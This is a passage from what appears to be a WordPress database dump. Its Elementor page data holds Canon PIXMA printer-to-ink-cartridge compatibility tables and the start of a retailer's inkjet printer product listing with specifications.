rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP610<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP628<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP638<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP648<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800R<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP810<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP830<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"7\\\" align=\\\"center\\\">PIXMA MP970<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP988<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP996<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n  <tr align=\\\"center\\\">\\n    <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n    <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX308<\\/td>\\n    <td>CL-41 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-831 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40\\/CL-41 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-830 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX328<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX338<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX347<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX366<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX426<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX876<\\/td>\\n    <td>CLI-821 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-820 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX886<\\/td>\\n    <td>CLI-726 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-725 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA PRO-1<\\/td>\\n    <td>PGI-29 (Chroma Optimizer)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Dark Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Light Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Matte Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Red)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Yellow)<\\/td>\\n  <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA PRO-10<\\/td>\\n      <td>PGI-72 (Chroma Optimizer)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Matte Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Red)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"8\\\" align=\\\"center\\\">PIXMA PRO-100<\\/td>\\n      <td>CLI-42 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Light Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TR8570<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS207<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS307<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TS5070<\\/td>\\n      <td>CLI-771 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA TS5170<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA TS8270<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA TS9170<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TS9570<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7153,3336,'_wp_page_template','template-fullwidth.php'),(7154,3336,'_elementor_edit_mode','builder'),(7155,3336,'_elementor_template_type','post'),(7156,3336,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA 